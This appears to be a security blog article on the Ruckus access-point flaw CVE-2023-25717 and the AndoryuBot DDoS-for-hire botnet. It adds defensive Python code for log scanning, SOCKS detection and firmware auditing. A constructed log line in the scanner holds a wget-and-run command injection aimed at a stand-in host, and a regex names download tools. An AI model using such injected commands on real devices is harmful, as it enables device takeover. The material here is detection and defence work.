In February 2023, Fortinet reported and fixed a new vulnerability targeting devices with unpatched firmware versions and recruiting such devices into a DDoS botnet. Later, in mid-April, Ruckus Wireless Access Points were discovered to be one of the botnet's main targets because of an RCE flaw. This critical-severity vulnerability was announced and tracked as CVE-2023-25717, and the botnet was dubbed the "AndoryuBot project". It was later discovered that its operators offer the DDoS botnet as a service to cybercriminals.
AndoryuBot - Ruckus Attack technique:
If you are a Ruckus Wireless user or admin, you should check your firmware version to be on the safe side. As reported by BleepingComputer, the RCE flaw affects Ruckus Access Points running firmware version 10.4 or earlier. On such a device, the attacker sends an unauthenticated HTTP GET request that makes the device download a malicious script from a hard-coded URL; the script then communicates with a C2 server, giving the operator control over the compromised device.
The targeting is quite broad: the malware is built for a number of system architectures, including x86, arm, spc, m68k, mips, sh4 and mpsl. It is worth noting that after infection, the malicious script communicates with the C2 server using the SOCKS proxying protocol to stay stealthy and get past firewalls on the way.
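The two behaviours described above give a defender two things to look for: an unauthenticated GET request whose parameters carry a download-and-execute shell fragment, and an outbound SOCKS handshake from the access point's management address. The following is an added example (not code from the article or from any vendor) that checks both against constructed inputs. The log lines, the request path "/PLACEHOLDER-path", the hostname example.invalid and the flow list are all made up for the example; the SOCKS4 and SOCKS5 byte layouts are the ones from RFC 1928 and the SOCKS4 protocol description.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache/nginx combined log format. They are
# illustrative only, not real Ruckus AP logs; the request path is a placeholder.
SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [15/Apr/2023:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.9 - - [15/Apr/2023:10:01:05 +0000] "GET /PLACEHOLDER-path?user=admin&pw=;wget%20http://example.invalid/bot.sh%20-O%20/tmp/x;sh%20/tmp/x HTTP/1.1" 200 88 "-" "curl/7.68.0"
203.0.113.7 - - [15/Apr/2023:10:01:09 +0000] "POST /api/status HTTP/1.1" 200 64 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Shell fragments that betray a download-and-execute payload smuggled into a
# request parameter. Matched against the URL-decoded request target only, so a
# "curl/..." User-Agent on a legitimate request does not trigger it.
DOWNLOAD_EXEC_RE = re.compile(
    r'\b(?:wget|curl|tftp)\b|[;|&]\s*(?:sh|bash|chmod)\b', re.IGNORECASE
)


def scan_access_log(log_text):
    """Return one dict per GET request whose decoded target looks like a
    download-and-execute injection."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a production tool would count these
        decoded = unquote(m["target"])
        if m["method"] == "GET" and DOWNLOAD_EXEC_RE.search(decoded):
            hits.append({"ip": m["ip"], "time": m["time"], "target": decoded})
    return hits


def classify_socks(first_bytes):
    """Classify the first client-to-server bytes of a TCP flow as a SOCKS
    handshake. Returns 'socks5', 'socks4' or None."""
    # SOCKS5 greeting: VER=0x05, NMETHODS, then exactly NMETHODS method bytes.
    if len(first_bytes) >= 3 and first_bytes[0] == 0x05:
        nmethods = first_bytes[1]
        if nmethods >= 1 and len(first_bytes) == 2 + nmethods:
            return "socks5"
    # SOCKS4 request: VN=0x04, CD=1 (connect) or 2 (bind), DSTPORT (2 bytes),
    # DSTIP (4 bytes), USERID terminated by a NUL byte.
    if (len(first_bytes) >= 9 and first_bytes[0] == 0x04
            and first_bytes[1] in (1, 2) and first_bytes[-1] == 0x00):
        return "socks4"
    return None


# Constructed outbound flows from an access point's management address:
# (destination IP, destination port, first client bytes). Not real captures.
SAMPLE_FLOWS = [
    ("192.0.2.10", 443, b"\x16\x03\x01\x00\xa5\x01\x00\x00\xa1"),      # TLS ClientHello
    ("198.51.100.20", 8443, b"\x05\x01\x00"),                           # SOCKS5 greeting, no auth
    ("198.51.100.21", 1080, b"\x04\x01\x00\x50\xc0\xa8\x01\x01\x00"),  # SOCKS4 connect
    ("192.0.2.11", 80, b"GET / HTTP/1.1\r\n"),
]


def flag_socks_flows(flows):
    """Return (destination, port, kind) for every flow that opens with a SOCKS handshake."""
    flagged = []
    for dst, port, data in flows:
        kind = classify_socks(data)
        if kind is not None:
            flagged.append((dst, port, kind))
    return flagged


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_ACCESS_LOG):
        print("suspicious GET:", hit)
    for dst, port, kind in flag_socks_flows(SAMPLE_FLOWS):
        print(f"{kind} handshake to {dst}:{port}")
```

The SOCKS check only recognises cleartext handshakes on the first bytes of a flow; if the bot wraps its proxy channel in TLS, the detector will only see a ClientHello, so the more robust signal is the destination itself: an access point's management interface should have a very short list of legitimate outbound destinations, and anything else is worth an alert regardless of protocol.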
About the AndoryuBot Project:
Cybercrime as a Service is nothing new. The AndoryuBot project's news probably reached you because the operators are not very quiet about it, and because it has targeted one of the most widely used access points globally, especially in hospitality venues and campuses. The project offers a DDoS botnet on demand to cybercriminals, with a specified list of attack types; all the operator needs is a target IP and a port number, and they are ready to set their attack in motion.
The malware supports 12 DDoS attack modes: tcp-raw, tcp-socket, tcp-cnc, tcp-handshake, udp-plain, udp-game, udp-ovh, udp-raw, udp-vse, udp-dstat, udp-bypass, and icmp-echo. So once the service is rented to a cybercriminal, the operators of AndoryuBot set the attack type, target IP and port number to launch the attack on the victim, and receive their compensation in a cryptocurrency (XMR, BTC, ETH, USDT, CashApp) for the service.
Rental Fees for AndoryuBot DDoS botnet:
It is darkly comic that the project operators offer two bundles for the DDoS attack service. Here are the available rental packages!
Type of connection | How many bots?
(bundle 1) | 50x / day
(bundle 2) | 100x / day
How to stay protected (If you're a Ruckus user):
Upgrade the firmware to a version later than 10.4
Use a strong device admin password
Disable the remote admin panel if it is not needed
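The first of those steps is only actionable once you know which access points are still on an affected build. The following is an added example (not code from the article or from Ruckus) that audits a constructed inventory export against the article's threshold. It assumes the cut-off can be applied at major.minor granularity, treating anything not newer than 10.4 as affected; the exact fixed builds should be confirmed against the vendor advisory for CVE-2023-25717. The hostnames, the model name "PLACEHOLDER-MODEL" and the version strings are all made up for the example.

```python
import csv
import io
import re

# The article's threshold: firmware 10.4 or earlier is affected, so anything
# not newer than 10.4 at major.minor granularity is flagged. Assumption made
# for this example; confirm the exact fixed builds against the vendor advisory.
LAST_AFFECTED = (10, 4)

# Accepts '10.4', 'v10.5.1', '10.4.1.0.163', ...; the leading major.minor is
# all that is compared.
_VERSION_RE = re.compile(r"^\s*v?(\d+)\.(\d+)")


def parse_major_minor(version):
    """Extract (major, minor) from a firmware version string.
    Raises ValueError for strings without a leading major.minor."""
    m = _VERSION_RE.match(version)
    if not m:
        raise ValueError(f"unrecognised firmware version: {version!r}")
    return int(m.group(1)), int(m.group(2))


def is_vulnerable_firmware(version):
    """True when the version is 10.4 or earlier (tuple comparison on major.minor)."""
    return parse_major_minor(version) <= LAST_AFFECTED


# Constructed inventory export (hostname, model, firmware). Not real devices;
# the last row shows a device whose version could not be collected.
SAMPLE_INVENTORY_CSV = """\
hostname,model,firmware
ap-lobby-01,PLACEHOLDER-MODEL,10.4.1.0.163
ap-lobby-02,PLACEHOLDER-MODEL,10.5.1.0.178
ap-campus-07,PLACEHOLDER-MODEL,9.0.0.0.321
ap-campus-08,PLACEHOLDER-MODEL,11.0.0.0.42
ap-unknown-09,PLACEHOLDER-MODEL,n/a
"""


def audit_inventory(csv_text):
    """Return (vulnerable_hostnames, unparseable_hostnames).

    Devices whose version cannot be parsed are reported separately rather
    than silently treated as safe."""
    vulnerable, unparseable = [], []
    for row in csv.DictReader(io.StringIO(csv_text)):
        try:
            if is_vulnerable_firmware(row["firmware"]):
                vulnerable.append(row["hostname"])
        except ValueError:
            unparseable.append(row["hostname"])
    return vulnerable, unparseable


if __name__ == "__main__":
    vuln, unknown = audit_inventory(SAMPLE_INVENTORY_CSV)
    print("needs upgrade:", vuln)
    print("could not determine version:", unknown)
```

Keeping the unparseable devices in their own list matters in practice: an inventory row with an empty or odd version string is usually an unmanaged or forgotten access point, which is exactly the kind of device that stays on old firmware.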
Links and Sources: